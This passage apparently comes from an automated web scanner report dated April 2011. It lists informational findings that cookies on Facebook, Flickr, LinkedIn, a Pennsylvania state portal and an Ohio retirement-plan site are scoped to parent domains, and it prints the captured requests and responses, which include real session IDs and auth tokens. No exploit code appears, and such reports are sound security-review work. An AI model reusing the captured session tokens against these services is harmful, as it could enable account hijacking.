Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/pages/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=ondUt; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.229.123
Connection: close
Date: Sat, 30 Apr 2011 12:32:09 GMT
Content-Length: 0


13.104. http://www.facebook.com/photo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /photo.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photo.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=9bvPF; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fphoto.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fphoto.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.206.101
Connection: close
Date: Sat, 30 Apr 2011 12:32:11 GMT
Content-Length: 11367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.105. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=cFyQm; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.200.118
Connection: close
Date: Sat, 30 Apr 2011 12:32:12 GMT
Content-Length: 10404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.106. http://www.facebook.com/video/video.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /video/video.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/video.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/video/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=SpXAc; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.247.111
Connection: close
Date: Sat, 30 Apr 2011 12:32:13 GMT
Content-Length: 0


13.107. http://www.flickr.com/groups_join.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups_join.gne

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups_join.gne HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:32:14 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=6sq0b5h6ro0ae&b=3&s=p3; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 29-Apr-2014 12:32:14 GMT; path=/; domain=.flickr.com
location: /signin/?acf=%2Fgroups_join.gne
X-Served-By: www133.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


13.108. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.humanservices.state.pa.us
Path:   /idm/managedidmpub/ca12/index.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /idm/managedidmpub/ca12/index.jsp HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:38:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=Xn255JB/z7Pw7pmrcL2h6EX7YofxQLN3+qf2C9vCznYViTgcYK5cF5ybg0hR41DyodcUlnlGDCRBCw6Mdy+WenI3MWiVReuxaNm+2hCLtDD8OyC6SJCMJImqXlsTPWeumhmVJnTlDZiVCL7FrU0ri6Fvui+28NUNQ+6icKmVuQL8PgVt54nJdbcWGPsJqhsOdL3pNYcsuksvStKfoRz1EgZEQg/QJ2QYwA+SwXqaR6qNaLW1ZX3MLDYS+tSvKBIK4ZKK46IdUYEzB8r4f8guukdOyn7N3y0BmUK+6UVgUcBBGcuARR/W80f5fYdD8gnAPi+ZmRJijUe5fw3lNjRtRX5ve27U7ZCZ8qifsTXcyTXvCVW3vj1/126x9hkykKpkF2q+EjiCMDxop+HHHAfSA598dcQBvwUAmAhOhLjTCaS+4Se23xXQE+ML3U8kMojuO3gfPmp2DQvezaoYHi9JjWWwH4xB4azWMkNq3a1yvDbODL9+q6RRGM7hMHAPCxUrgBLLc5AIIKtTH7dBItOWubJVnQ7o/x995HISomyKBmfOw5x4/1LK5n24D4OLrsBV; expires=Mon, 29 Apr 2013 12:38:48 GMT; path=/; domain=.state.pa.us
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.humanservices.state.pa.us/idm/logout.jsp?locale=en
Content-Language: en-US
Content-Length: 0
Set-Cookie: JSESSIONID=0000DH9ACykUxxvSiT2oEg7J38I:-1; Path=/
Set-Cookie: JSESSIONID=0000G5gEuvTxUvuQQ6tqmfj9Uwr:-1; Path=/
Server: WebSphere Application Server/6.1


13.109. http://www.linkedin.com/companies/166141  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /companies/166141

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /companies/166141 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Location: http://www.linkedin.com/company/166141
Set-Cookie: leo_auth_token="GST:ZX3BVkL624kZH12gK83CkLAoXl0K_FNKEQ3JBrT8Grk__r2olpnpjt:1304167152:08db119e86636a18ab0d692b9f330a953178d1ea"; Version=1; Max-Age=1799; Expires=Sat, 30-Apr-2011 13:09:11 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:6563456284922235219"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Thu, 18-May-2079 15:53:19 GMT; Path=/
Set-Cookie: bcookie="v=1&cbe517af-b4ab-41c5-ad8d-0e398f1d4f45"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Thu, 18-May-2079 15:53:19 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Date: Sat, 30 Apr 2011 12:39:12 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19962b45525d5f4f58455e445a4a42198c;expires=Sat, 30-Apr-2011 13:10:19 GMT;path=/;httponly
Content-Length: 0


13.110. http://www.molottery.com/winningNumbers.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.molottery.com
Path:   /winningNumbers.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /winningNumbers.do HTTP/1.1
Host: www.molottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:37:25 GMT
Server: Apache/2.0
Set-Cookie: lottery-track=173.193.214.243.1304167045882473; path=/; expires=Sun, 29-Apr-12 12:37:25 GMT; domain=.molottery.com
Set-Cookie: JSESSIONID=B68A0D1FE6158E2B37564B1E5B08F479.tomcat2; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 10954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<html>
<head>
<link href="/c
...[SNIP]...

13.111. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/css/dcdweb/Ohio457-site.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/css/dcdweb/Ohio457-site.css HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:38 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2CDEE64A72C910722281D874740EB2E6; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 26 Apr 2011 20:14:52 GMT
ETag: "20c0b9-4221-fa0c6700"
Accept-Ranges: bytes
Content-Length: 16929
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/css

/*START Reset Styles*/html,body,div,span,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,abbr,address,cite,code,del,dfn,em,img,ins,kbd,q,samp,small,strong,var,b,i,dl,dt,dd,ol,ul,li,fieldset,form,labe
...[SNIP]...

13.112. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/css/dcdweb/base-style.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/css/dcdweb/base-style.css HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:37 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2C61FEFA72C910721065FD47DEDA6F26; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Mon, 31 Jan 2011 14:30:56 GMT
ETag: "1181a9-1e-43892800"
Accept-Ranges: bytes
Content-Length: 30
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/css

/* INTENTIONALLY LEFT BLANK */

13.113. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/css/dcdweb/print.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/css/dcdweb/print.css HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:38 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2CD9DA4272C9107208B9A4861F3DF71F; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 09 Jul 2009 14:10:28 GMT
ETag: "118209-4ab-6af43d00"
Accept-Ranges: bytes
Content-Length: 1195
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/css

#navigation,
#extra,
#help,
#viewPrintableCopyLink,
#buttons,
#primary-navigation,
#global-navigation,
#utility-navigation {
   display:none !important;
   }

* {
   overflow:visible !important;    
   bord
...[SNIP]...

13.114. https://www.nrsservicecenter.com/content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=3007D26E72C9107208C1A4861F3DF71F; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 24 Mar 2011 16:26:56 GMT
ETag: "11823c-d6ea-f221d400"
Accept-Ranges: bytes
Content-Length: 55018
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......Exif..II*...........................b...........j...(...........1.......r...2...........i.................
..'....
..'..Adobe Photoshop CS5 Macintosh.2011-03-24T16:26:56-04:00...........0220....
...[SNIP]...

13.115. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Logos/Ohio457.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Logos/Ohio457.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:38 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2CD9FB4472C910721FE181E018D630EF; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Fri, 07 Jul 2006 20:13:02 GMT
ETag: "248065-1958-7dd62f80"
Accept-Ranges: bytes
Content-Length: 6488
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..F....    
......YVW..........$.c$".......TK.......+!...IFG.............(#urs........$.ia.......}w............)%&.......,#856......|z{......ebcmjk....F>7$$....un.2).`X.>5". .!... ............wuup
...[SNIP]...

13.116. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2ED0E93072C910722284D874740EB2E6; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 14:40:55 GMT
ETag: "1780fa-477-b430ebc0"
Accept-Ranges: bytes
Content-Length: 1143
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....hExif..II*...............>...........F...(...........1.......N.......H.......H.......Paint.NET v3.5.6.....C....................................................................C.
...[SNIP]...

13.117. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:43 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2F69EA9072C9107213D2B514D844AB71; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 16:52:24 GMT
ETag: "5c004-646-8a698200"
Accept-Ranges: bytes
Content-Length: 1606
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......Exif..II*.......1.......2...2.......P...i.......j.......Adobe Photoshop CS5 Macintosh.2011-01-25T16:52:24-05:00...........0220    .................................................Ducky.......d.....
...[SNIP]...

13.118. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=300926FA72C91072228FD874740EB2E6; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 16:44:12 GMT
ETag: "1780fc-64e-6d162f00"
Accept-Ranges: bytes
Content-Length: 1614
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

